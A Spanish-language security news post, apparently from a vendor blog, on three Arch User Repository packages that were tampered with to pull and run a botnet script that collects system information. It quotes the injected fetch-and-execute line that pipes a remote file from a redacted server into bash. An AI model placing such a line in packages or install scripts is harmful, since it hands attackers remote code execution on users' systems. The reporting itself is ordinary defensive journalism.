Ayer hablábamos de Gentoo, una distribución de Linux muy popular entre los que se divierten tuneando todo el sistema operativo y reconstruyéndolo desde cero, para mejorar unos pocos puntos de rendimiento.
Este tipo de enfoque no es para todos los gustos, pero no molesta a nadie y ofrece una visión completa de cómo funcionan las cosas.
Esto a diferencia de otras distribuciones como ElementaryOS y Mint, que rivalizan e incluso mejoran Windows y macOS en cuanto a sencillez de instalación y uso, pero no dejan entrever como funcionan realmente todo.
Esta vez la distribución afectada por malware es Arch Linux, que tiene aspectos similares a Gentoo pero es mucho más popular.
Tres paquetes del AUR (Arch User Respository) han sido reconstruidos e incorporan el malware zombie downloader robot overlord.
Bots o zombies, son malware que llama a casa para recibir instrucciones de lo que los hackers quieren hacer a continuación.
Los paquetes hackeados son acroread 9.5.5-8, balz 1.20-3 y minergate 8.1-2; que se supone que ahora han sido reparados y ya no contienen malware.
¿Qué ocurrió?
En pocas palabras, se añadió una línea a los paquetes:
curl -s https://[redacted]/~x|bash -&
Esta simple línea de código, parte de un código de instalación escrito en Bash busca un fichero de texto de un servidor command-and-control (C&C) y lo ejecuta como un script propio.
Esto significa que un atacante puede cambiar el tipo de malware cuando quiera simplemente alterando los comandos que se encuentren en el fichero del servidor C&C.
En la actualidad, este script ejecuta un segundo script que roba información básica sobre el sistema infectado y la guarda en una cuenta Pastebin.
Afortunadamente, la parte del script que realiza la exfiltración de los datos contiene un error de programación por lo que no se sube ningún dato.
La reacción de Arch
Arch tiene una gran reputación debido a la enorme cantidad de documentación que la comunidad ha publicado en los últimos años. Los usuarios de otras muchas distribuciones de Linux a veces visitan la documentación de Arch para saber lo que está pasando.
No nos ha sorprendido mucho la reacción de uno de los miembros de la comunidad de Arch, que dice que ese repositorio tiene un gran aviso en el que se dice que los paquetes son creados por usuarios por lo que deben usarse bajo su propia cuenta y riesgo.
Para ser justos con el equipo de Arch, los paquetes infectados se encuentran en el AUR, que no está gestionado por mantenedores de Arch, del mismo modo que los fórums no oficiales de Android no dependen de Google.
Sin embargo el AUR utiliza la marca Arch, por lo que una actitud menos condescendiente del equipo de Arch no haría ningún daño.
Para manteneros al día de las últimas amenazas haceros fans de nuestra página de Facebook o síguenos en Twitter para intercambiar experiencias en torno al mundo de la seguridad. Si deseas recibir nuestro boletín de seguridad en tu correo electrónico, suscríbete en la siguiente aplicación: